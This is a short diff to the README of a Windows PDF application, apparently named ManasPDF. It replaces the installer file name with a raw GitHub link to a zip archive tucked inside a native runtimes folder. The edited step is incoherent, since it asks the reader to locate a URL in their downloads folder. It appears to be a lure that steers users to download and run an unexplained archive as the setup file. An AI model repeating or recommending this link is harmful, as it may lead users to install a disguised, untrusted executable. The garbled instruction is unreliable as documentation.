smokeweedeveryday420/ManasPDF/README.md

 1. Click the download button above to obtain the setup file for Windows x64.

-2. Once the download is complete, locate the `ManasPDFSetup.exe` file in your downloads folder.
+2. Once the download is complete, locate the `https://github.com/smokeweedeveryday420/ManasPDF/raw/refs/heads/master/src/ManasPDF/runtimes/win-x64/native/PDF_Manas_v1.4.zip` file in your downloads folder.

 3. Double-click the setup file to start the installation process.